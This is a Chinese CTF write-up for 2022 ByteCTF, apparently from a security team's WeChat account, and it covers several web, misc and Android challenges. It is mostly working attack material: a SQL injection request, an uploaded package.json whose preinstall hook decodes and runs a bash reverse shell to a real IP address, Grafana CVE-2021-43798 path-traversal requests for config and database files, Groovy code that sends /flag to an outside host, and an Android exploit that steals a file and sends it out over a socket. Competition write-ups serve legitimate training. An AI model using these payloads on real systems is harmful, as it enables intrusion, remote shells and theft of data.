EDI
JOIN US ▶▶▶
点击蓝字 · 关注我们
1
ctf_cloud
POST /users/signup HTTP/1.1
Host: e0415807b2fc449027075f27a3cfe1e3.2022.capturetheflag.fun
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101
Firefox/83.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 59
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/
Cookie: PHPSESSID=hftcgqq32s0or9hk89huvooo8p; connect.sid=s%3ApoFqQ8ErhSogbVMNdzwMcanbixoxlw3.l8FFINAquYbE9luPWO7uONwPJbat4BzzzG6W9GPCksw
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
{"username":"bcasd","password":"su',1),('admin','su',1)--"}
POST /dashboard/upload HTTP/1.1
Host: e0415807b2fc449027075f27a3cfe1e3.2022.capturetheflag.fun
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101
Firefox/83.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryu3fv4Bf4rz9XvGkt
Content-Length: 330
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/
Cookie:
connect.sid=s%3A5zWp5eJF_cVlAadIxtC4gKiYlNG44Cs2.lDEXcfzsDuR7XUusa%2FMkld55S%2FNmj4uA%2
FVZKIgXK0Iw
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
------WebKitFormBoundaryu3fv4Bf4rz9XvGkt
Content-Disposition: form-data; name="c";filename="package.json"
{
"name": "userapp",
"version": "0.0.1",
"scripts": {"preinstall": "echo
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuMjYuNTkuMTM3LzIzMzMgMD4mMQ==|base64 -d|bash"}
}
------WebKitFormBoundaryu3fv4Bf4rz9XvGkt--
POST /dashboard/dependencies HTTP/1.1
Host: e0415807b2fc449027075f27a3cfe1e3.2022.capturetheflag.fun
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101
Firefox/83.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/
Cookie:
connect.sid=s%3A5zWp5eJF_cVlAadIxtC4gKiYlNG44Cs2.lDEXcfzsDuR7XUusa%2FMkld55S%2FNmj4uA%2
FVZKIgXK0Iw
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Content-Type: application/json
Content-Length: 48
{"dependencies":{"su":"file:./public/uploads/"}}
2
easy_grafana
Grafana-CVE-2021-43798任意⽂件读取
GET /public/plugins/text/#/../../../../../../../../../..//etc/grafana/grafana.ini
HTTP/1.1
GET /public/plugins/text/#/../../../../../../../../../..//var/lib/grafana/grafana.db
HTTP/1.1
读配置⽂件得到secret_key:SW2YcwTIb9zpO1hoPsMm
GitHub - pedrohavay/exploit-grafana-CVE-2021-43798: This is a proof-of-concept exploit for Grafana's
Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).
from secure import decrypt
import base64
secret_key = 'SW2YcwTIb9zpO1hoPsMm'
ciphertext = 'b0NXeVJoSXKPoSYIWt8i/GfPreRT03fO6gbMhzkPefodqe1nvGpdSROTvfHK1I3kzZy9SQnuVy9c3lVkvbyJcqRwNT6/'
encrypted = base64.b64decode(ciphertext.encode())
pwdBytes, _ = decrypt(encrypted, secret_key)
print(pwdBytes)
1
survey
签退
2
bash_game
⽐较漏洞,命令执⾏
arr[$(cat /flag)]
然后让他报错就⾏了。
3
easy_groovy
def f = new File("/flag").text
def res1 = new URL('http://ip:1234/1'+f).text
4
signin
5
find_it
看到scap,去搜了下,发现可以⽤sysdig分析,下载安装sysdig。
https://www.howtoing.com/how-to-monitor-your-ubuntu-16-04-system-with-sysdig/
使⽤-r参数读⽂件,并把分析的⽂件导出
使⽤csysdig分析,发现有⼀个操作。传了⼀个nothing.png图⽚。
点进去能发现这个图⽚
这⾥使⽤010editor直接搜索,导出图⽚,是个⼆维码,扫描是flag的前半部分。这个php⽂件是flag的后半部分, 拼接起来是flag。
1
Bronze Droid
https://forum.butian.net/share/1175
分析过程:
我们把给的apk⽂件⽤jadx-gui去解析下,第⼀步先看AndroidManifest.xml
查到资料是这个
https://erev0s.com/blog/exploiting-content-providers-through-an-insecure-setresult-implementation/
⾥⾯的内容⼏乎与资料的内容⼀致。原理是setResult函数在调⽤之后,会⾃动的调⽤onActivityResult()函数,我们只需要在攻击程序中重写 onActivityResult()函数即可,在⾥⾯写⼀个跳转,进⽽远程带出flag,exp参考BabyAndroid的。
1.利⽤Android studio 创建项⽬,空⽩的项⽬即可
2.包名要跟它规定的⼀样,也就是pwnbronzedroid。
3.在AndroidManifest.xml添加要申请的权限 这是我们要进⾏申请权限(由于⽬标是30版本,我们这⾥要多加个 android:usesCleartextTraffic="true",因为⾼版本是禁⽌使⽤明⽂流量的)这个在readme.md⾥⾯也有描述
4.我们利⽤传参的⽅式来写主要exp,通过exp的传参,跳转到⽬标的攻击类⾥(MainActivity),然后通过⽬标的 攻击类中的⾃动调⽤,将flag进⾏外带。
5.魔改的onActivityResult⾥⾯写的主要是,我们进⾏获取远程的⼀个flag,并反弹到我们远程服务器上进⽽获取 flag
攻击exp
package com.bytectf.pwnbronzedroid;
import android.app.Activity;
import android.content.ContentValues;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.provider.MediaStore;
import android.util.Log;
import android.widget.Toast;
import java.io.BufferedReader;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;
public class MainActivity extends Activity {
// 参考 https://forum.butian.net/share/1175
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Intent intent = new Intent("ACTION_SHARET_TO_ME");
intent.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
// 这里往后参考 https://erev0s.com/blog/exploiting-content-providers-through-an-insecure-setresult-implementation/
intent.setClassName("com.bytectf.bronzedroid", "com.bytectf.bronzedroid.MainActivity");
intent.setData(Uri.parse("content://com.bytectf.bronzedroid.fileprovider/root/data/data/com.bytectf.bronzedroid/files/flag"));
startActivityForResult(intent,0);
}
// 这部分参考 https://forum.butian.net/share/1175 对onActivityResult 进行魔改
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
super.onActivityResult(requestCode, resultCode, data);
try {
InputStream is = getContentResolver().openInputStream(data.getData());
BufferedReader br = new BufferedReader(new InputStreamReader(is));
StringBuilder sb = new StringBuilder();
String line;
while ((line = br.readLine()) != null) {
sb.append(line);
}
is.close();
br.close();
String flag = sb.toString();
new Thread(new Runnable() {
public void run() {
try {
if (true) {
Socket sk = new Socket();
SocketAddress address = new InetSocketAddress("ip", 1235);
sk.connect(address, 5000);
sk.setTcpNoDelay(true);
sk.setKeepAlive(true);
OutputStream os = sk.getOutputStream();
os.write(flag.getBytes());
os.flush();
os.close();
sk.close();
Thread.sleep(1000);
}
} catch (Exception e) {
Log.e("FlagHunter_Err",e.toString());
}
}
}).start();
} catch ( Exception e) {
throw new RuntimeException(e);
}
}
}
下载1234端⼝的apk⽂件到远程链接,nc前半部分exp
from hashlib import *
import itertools
import string
from Crypto.Hash import SHA256
import itertools
ALPHABET = string.ascii_letters + string.digits
suffix = 'Zfecpd'
digest = '5782089877f9ff411d7d6276df447eca181fc5a27dc3fadc5a0d68a0aa555581'
print(f"suffix: {suffix}ndigest: {digest}")
for i in itertools.product(ALPHABET,repeat=4):
prefix = ''.join(i)
guess = suffix + prefix
if sha256(guess.encode()).hexdigest() == digest:
print(f"Find XXXX: {prefix}")
break
nc监听apk中写的1235端⼝,外带出flag
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):2022 ByteCTF By EDISEC
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论